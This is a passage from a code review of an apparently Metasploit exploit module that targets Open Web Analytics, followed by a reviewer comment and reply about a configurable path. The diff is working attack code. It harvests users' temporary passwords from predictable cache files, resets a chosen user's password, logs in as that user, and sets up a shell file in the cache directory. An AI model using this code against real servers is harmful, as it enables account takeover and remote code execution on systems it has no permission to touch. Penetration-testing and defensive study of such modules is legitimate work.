modules/exploits/multi/http/open_web_analytics_rce.rb

```diff
@@ -0,0 +1,295 @@
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => get_random_string(8),
+        'owa_action' => 'base.login'
+      }
+    )
+    if res.code != 200
+      fail_with(Failure::Unknown, 'An error occured during the login attempt!')
+    end
+
+    print_status("Attempting to find cache of '#{username}' user")
+
+    found = false
+    cache = nil
+    100.times do |key|
+      user_id = "user_id#{key}"
+      userid_hash = Digest::MD5.hexdigest(user_id)
+      filename = "#{userid_hash}.php"
+      cache_request = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, "/owa-data/caches/#{key}/owa_user/#{filename}")
+      )
+      if cache_request.code == 404
+        next
+      end
+
+      cache_raw = cache_request.body
+      cache = get_cache_content(cache_raw)
+      cache_username = get_cache_username(cache)
+      if cache_username != username
+        print_message("The temporary password for a different user was found. \"#{cache_username}\": #{get_cache_temppass(cache)}", 'INFO')
+        next
+      else
+        found = true
+        break
+      end
+    end
+
+    if !found
+      fail_with(Failure::Unknown, "No cache found. Are you sure \"#{username}\" is a valid user?")
+    end
+
+    cache_temppass = get_cache_temppass(cache)
+    print_good("Found temporary password for user '#{username}': #{cache_temppass}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.usersPasswordEntry'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_password' => new_password,
+        'owa_password2' => new_password,
+        'owa_k' => cache_temppass,
+        'owa_action' => 'base.usersChangePassword'
+      }
+    )
+
+    if res.code != 302
+      fail_with(Failure::Unknown, 'An error occurred when changing the user password!')
+    end
+    print_good("Changed the password of '#{username}' to '#{new_password}'")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.loginForm'),
+      'keep_cookies' => true,
+      'vars_post' => {
+        'owa_user_id' => username,
+        'owa_password' => new_password,
+        'owa_action' => 'base.login'
+      }
+    )
+
+    redirect = res['location']
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => URI(redirect).path
+    )
+    if res && res.code == 200
+      print_good("Logged in as #{username} user")
+    else
+      fail_with(Failure::Unknown, "An error occurred during the login attempt of user #{username}")
+    end
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
+    )
+
+    nonce = get_update_nonce(res)
+    log_location = '/var/www/html/owa-data/caches/' + shell_filename
```

Comment:
Should `/var/www/html/` be configurable via module option?

Reply:
Yes, great catch. This path can differ depending on the deployment and it should be configurable. Changed it accordingly.